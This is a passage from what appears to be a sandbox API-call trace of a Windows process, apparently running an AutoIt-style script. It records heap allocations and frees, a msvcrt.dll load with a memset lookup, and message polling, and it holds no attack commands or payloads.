RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908b0 [0074.844] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0074.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0074.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908b0 [0074.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0074.844] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0074.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0074.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908b0 [0074.845] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0074.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0074.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908b0 [0074.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0074.845] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0074.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0074.845] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0074.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0074.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908b0 [0074.845] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0074.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908b0 [0074.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0074.845] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0074.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0074.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0074.845] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0074.845] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0074.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0074.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0074.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0074.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0074.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0074.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0074.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0074.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0074.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9f0 [0074.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0074.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0074.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0074.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0074.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0074.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0074.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0074.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0074.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0074.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0074.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0074.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0074.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0074.846] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0074.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0074.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0074.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0074.846] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0074.847] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0074.847] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0074.847] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0074.847] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0074.847] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0074.847] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0074.847] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0074.847] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0074.847] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0074.847] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f90000 [0074.847] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0074.847] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0074.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0074.847] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x7) returned 0x6bb388 [0074.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x6bb388, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0074.847] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0074.848] GetProcAddress (hModule=0x76f90000, lpProcName="memset") returned 0x76f99790 [0074.848] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0074.848] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0074.848] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db30 [0074.848] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0074.848] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0074.848] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0074.848] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0074.848] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0074.848] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0074.848] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db30 | out: hHeap=0x650000) returned 1 [0074.848] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0074.848] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x782b10 [0074.848] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0074.848] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0074.848] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0074.848] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0074.848] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0074.848] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0074.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0074.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0074.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0074.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0074.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0074.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0074.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0074.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0074.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0074.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0074.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0074.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0074.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0074.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0074.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0074.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0074.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0074.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0074.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0074.849] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0074.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0074.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0074.849] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0074.850] FreeLibrary (hLibModule=0x76f90000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0074.850] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0074.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0074.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0074.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0074.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0074.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0074.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0074.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x782b10 | out: hHeap=0x650000) returned 1 [0074.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0074.851] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0074.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x782b10 [0074.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0074.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x782b10 | out: hHeap=0x650000) returned 1 [0074.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0074.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0074.851] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.851] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0074.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0074.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0074.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0074.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0074.851] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.852] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0074.852] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0074.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0074.852] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0074.852] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0074.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0074.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0074.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0074.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690970 [0074.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0074.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0074.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0074.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0074.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6908d0 [0074.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0074.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0074.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0074.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690820 [0074.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0074.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0074.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0074.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ad30 [0074.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db58 [0074.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0074.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0074.853] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0074.853] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0074.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9f0 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908b0 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0074.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db30 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0074.854] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0074.854] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dab8 [0074.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0074.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0074.855] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0074.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0074.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0074.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0074.855] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0074.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da90 [0074.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0074.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0074.855] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0074.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da40 [0074.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0074.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0074.855] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da68 [0074.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0074.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0074.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0074.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0074.855] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0074.855] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0074.855] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0074.856] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0074.856] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0074.856] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0074.856] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0074.856] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0074.856] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0074.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0074.856] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: 